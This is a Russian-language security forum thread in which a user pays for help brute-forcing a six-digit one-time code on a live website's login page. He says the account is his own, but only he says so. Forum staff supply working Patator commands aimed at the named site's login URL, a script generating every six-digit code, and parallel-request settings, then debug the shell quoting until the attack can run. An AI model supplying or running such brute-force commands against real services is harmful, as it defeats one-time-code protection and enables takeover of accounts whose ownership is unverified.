• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

нужна помощь в настройке программы Patator

billipermi

Member
15.05.2024
10
0
BIT
41
нуждаюсь в помощи в настройке программы Patator (возможны другие варианты) так как простой скрипт Пайтон на перебор пароля (6 цифр) занял у меня 9 часов. Тема белая, действия надо производить в личном кабинете (доступ представлю), надо подобрать пароль из 6 цифр посланный на на номер телефона (Австралия) от которого я потерял (ограничен в доступе, остался только слабый интернет) по причине отсутствия больше года на территории Австралии
Пататор вроде работает, но я не могу создать скрипт где body одно поле, те скрипты что нашел в интернете рассчитаны на body с двумя полями usermane и password, и вторая проблема создать словарь.
Ребятушки помогите - заплачу 2000 рублей, за настройку программы и за обучение
 

Admin80

Green Team
12.01.2017
97
43
BIT
377

Пример использования Patator с одним полем​

Допустим, что у вас есть URL для отправки запроса, например, , и в теле запроса вам нужно отправить только поле password.
Bash:
patator http_fuzz url=https://example.com/login method=POST body='password=FILE0' 0=wordlist.txt -x ignore:fgrep='Invalid'
В этом примере wordlist.txt – это файл словаря, который мы создадим, а ignore:fgrep='Invalid' – это строка, которую мы будем игнорировать в ответе сервера, указывающая на неправильный пароль.

Создание словаря для перебора шестизначных чисел​

Python для генерации файла словаря:
Python:
with open("wordlist.txt", "w") as f:
    for i in range(1000000):
        f.write(f"{i:06d}\n")
Этот скрипт создаст файл wordlist.txt, который будет содержать все возможные шестизначные комбинации чисел от 000000 до 999999.
Вы можете настроить дополнительные параметры для Patator, например, количество одновременных запросов:

Bash:
patator http_fuzz url=https://example.com/login method=POST body='password=FILE0' 0=wordlist.txt -x ignore:fgrep='Invalid' -t 10
Параметр -t 10 указывает на выполнение 10 параллельных запросов одновременно или так если логин вообще не нужен:
Bash:
patator http_fuzz url=https://example.com/submit method=POST body='password=FILE0' 0=wordlist.txt -x ignore:fgrep='Invalid'
 

billipermi

Member
15.05.2024
10
0
BIT
41

Пример использования Patator с одним полем​

Допустим, что у вас есть URL для отправки запроса, например, , и в теле запроса вам нужно отправить только поле password.
Bash:
patator http_fuzz url=https://example.com/login method=POST body='password=FILE0' 0=wordlist.txt -x ignore:fgrep='Invalid'
В этом примере wordlist.txt – это файл словаря, который мы создадим, а ignore:fgrep='Invalid' – это строка, которую мы будем игнорировать в ответе сервера, указывающая на неправильный пароль.

Создание словаря для перебора шестизначных чисел​

Python для генерации файла словаря:
Python:
with open("wordlist.txt", "w") as f:
    for i in range(1000000):
        f.write(f"{i:06d}\n")
Этот скрипт создаст файл wordlist.txt, который будет содержать все возможные шестизначные комбинации чисел от 000000 до 999999.
Вы можете настроить дополнительные параметры для Patator, например, количество одновременных запросов:

Bash:
patator http_fuzz url=https://example.com/login method=POST body='password=FILE0' 0=wordlist.txt -x ignore:fgrep='Invalid' -t 10
Параметр -t 10 указывает на выполнение 10 параллельных запросов одновременно или так если логин вообще не нужен:
Bash:
patator http_fuzz url=https://example.com/submit method=POST body='password=FILE0' 0=wordlist.txt -x ignore:fgrep='Invalid'
ошибка 0=wordlist.txt команда не найдена, хотя этот файл по всему компютеру раскидал
 

Admin80

Green Team
12.01.2017
97
43
BIT
377
ошибка 0=wordlist.txt команда не найдена, хотя этот файл по всему компютеру раскидал
Убедитесь, что файл wordlist.txt находится в правильном месте или укажите полный путь к этому файлу. Например:
0=/path/to/wordlist.txt
проверьте правильность команды пример корректной:
Bash:
patator http_fuzz url=https://example.com/submit method=POST body='password=FILE0' 0=/path/to/wordlist.txt -x ignore:fgrep='Invalid'
пример команды с прверкой пути:
Bash:
patator http_fuzz url=https://example.com/submit method=POST body='password=FILE0' 0=/path/to/wordlist.txt -x ignore:fgrep='Invalid'
/path/to/wordlist.txt - /path/to/ нужно заменить на ваш путь
 

billipermi

Member
15.05.2024
10
0
BIT
41
Убедитесь, что файл wordlist.txt находится в правильном месте или укажите полный путь к этому файлу. Например:
0=/path/to/wordlist.txt
проверьте правильность команды пример корректной:
Bash:
patator http_fuzz url=https://example.com/submit method=POST body='password=FILE0' 0=/path/to/wordlist.txt -x ignore:fgrep='Invalid'
пример команды с прверкой пути:
Bash:
patator http_fuzz url=https://example.com/submit method=POST body='password=FILE0' 0=/path/to/wordlist.txt -x ignore:fgrep='Invalid'
/path/to/wordlist.txt - /path/to/ нужно заменить на ваш путь
 

Вложения

  • IMG_0645.jpg
    IMG_0645.jpg
    51,5 КБ · Просмотры: 31
  • IMG_0646.jpg
    IMG_0646.jpg
    32,4 КБ · Просмотры: 30

Admin80

Green Team
12.01.2017
97
43
BIT
377
что я делаю неправильно ?????

Bash:
patator http_fuzz url="http://www.putrike.com/WebResources/accounts/login" method=POST body='password=FILE0' 0=/home/liza/wordlist.txt -x ignore:fgrep='Invalid'
Убедитесь, что:

  • Файл wordlist.txt действительно существует в каталоге /home/liza/.
  • У вас есть доступ к этому файлу.

Проверка существования файла​

Вы можете выполнить команду ls, чтобы проверить, существует ли файл:
Bash:
ls /home/liza/wordlist.txt
проверьте права доступа к файлу и убедитесь, что ваш пользователь имеет права на чтение этого файла.
 

billipermi

Member
15.05.2024
10
0
BIT
41
Bash:
patator http_fuzz url="http://www.putrike.com/WebResources/accounts/login" method=POST body='password=FILE0' 0=/home/liza/wordlist.txt -x ignore:fgrep='Invalid'
Убедитесь, что:

  • Файл wordlist.txt действительно существует в каталоге /home/liza/.
  • У вас есть доступ к этому файлу.

Проверка существования файла​

Вы можете выполнить команду ls, чтобы проверить, существует ли файл:
Bash:
ls /home/liza/wordlist.txt
проверьте права доступа к файлу и убедитесь, что ваш пользователь имеет права на чтение этого файла.
вот
 

Вложения

  • IMG_0649.jpg
    IMG_0649.jpg
    69,2 КБ · Просмотры: 15
  • IMG_0650.jpg
    IMG_0650.jpg
    49,2 КБ · Просмотры: 20

Admin80

Green Team
12.01.2017
97
43
BIT
377
можно как то увидеть что у Вас в консоли происходит полностью?
Bash:
# Установка зависимости
pip3 install requests

# Запуск команды Patator
patator http_fuzz url="https://www.purkle.com.au/WebResources/accounts/login" method=POST body='password=FILE0' 0=/home/liza/wordlist.txt -x ignore:fgrep='Invalid'
 

billipermi

Member
15.05.2024
10
0
BIT
41
можно как то увидеть что у Вас в консоли происходит полностью?
у меня русскоязчная версия линукса, я установил пататор и все действия совершаю в терминале с правами администратора. Извините а консоль это не терминал?
вот снимок на текущий момент
 

Вложения

  • IMG_0651.jpg
    IMG_0651.jpg
    58,8 КБ · Просмотры: 16
Последнее редактирование:

Admin80

Green Team
12.01.2017
97
43
BIT
377
у меня русскоязчная версия линукса, я установил пататор и все действия совершаю в терминале с правами администратора. Извините а консоль это не терминал?
терминал - все верно, обычно patator не требует прав администратора - проверьте все зависимости
 

larchik

Администратор
07.06.2019
401
476
BIT
414
может быть путь до файла стоит взять в кавычки (двойные или одинарные), url тоже возьмите в кавычки. Скорее всего в нем есть символы, которые интерпретируются bash
 
Последнее редактирование:

billipermi

Member
15.05.2024
10
0
BIT
41
может быть путь до файла стоит взять в кавычки (двойные или одинарные), url тоже возьмите в кавычки. Скорее всего в нем есть символы, которые интерпретируются bash
не проходит. может судьба у меня такая. хочется плюнуть на эту программу. ПОСОВЕТУЙТЕ НА КАКОЙ ЕЩЕ ПРОГРАММЕ ПОТРЕНИРОВАТСЯ????
ЧТОБЫ БЫСТРО ПЕРЕИБИРАЛА ПАРОЛИ И БЫЛА ДРУЖЕЛЮБНОЙ
 

Admin80

Green Team
12.01.2017
97
43
BIT
377
не проходит. может судьба у меня такая. хочется плюнуть на эту программу. ПОСОВЕТУЙТЕ НА КАКОЙ ЕЩЕ ПРОГРАММЕ ПОТРЕНИРОВАТСЯ????
ЧТОБЫ БЫСТРО ПЕРЕИБИРАЛА ПАРОЛИ И БЫЛА ДРУЖЕЛЮБНОЙ
Bash:
patator http_fuzz url="https://www.purkle.com.au/WebResources/accounts/login" method=POST body='password=FILE0' 0='/home/liza/wordlist.txt' -x ignore:fgrep='Invalid'
попробуйте, но если вы копипастите не понимая что и зачем вы делаете то вряд ли вы найдете дружелюбную программу.
 

larchik

Администратор
07.06.2019
401
476
BIT
414
не проходит. может судьба у меня такая. хочется плюнуть на эту программу. ПОСОВЕТУЙТЕ НА КАКОЙ ЕЩЕ ПРОГРАММЕ ПОТРЕНИРОВАТСЯ????
ЧТОБЫ БЫСТРО ПЕРЕИБИРАЛА ПАРОЛИ И БЫЛА ДРУЖЕЛЮБНОЙ
по фотке видно, что в url есть символ &, вероятно он и является причиной ошибки в конечном счете. Поэтому надо вять его (url) весь в кавычки.
Кроме того я там вижу слово resolve - откуда оно там?
И что было перед выполнением этой команды?
Отвечу за вас. Перед этой командной, которую частично видно на фото, была выполнена команда patator http_fuzz url=... влоть до символа &, затем она завершилась ошибкой, так как часть команды после символа & не выполнилась и далее все пошло крахом ) Bash попытался интерпретировать вторую часть команды, как отдельную операцию и споткнулся на 0=/home/liza...

Желательно приложить нормальную фотку всего терминала целиком, приватные данные можно (нужно) замазать
 

Вложения

  • IMG_0648.jpg
    IMG_0648.jpg
    65,7 КБ · Просмотры: 16
Последнее редактирование:

Admin80

Green Team
12.01.2017
97
43
BIT
377
не проходит. может судьба у меня такая. хочется плюнуть на эту программу. ПОСОВЕТУЙТЕ НА КАКОЙ ЕЩЕ ПРОГРАММЕ ПОТРЕНИРОВАТСЯ????
ЧТОБЫ БЫСТРО ПЕРЕИБИРАЛА ПАРОЛИ И БЫЛА ДРУЖЕЛЮБНОЙ
добавлю что если копипастите то хотя бы проверяйте пробелы и кавычки
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!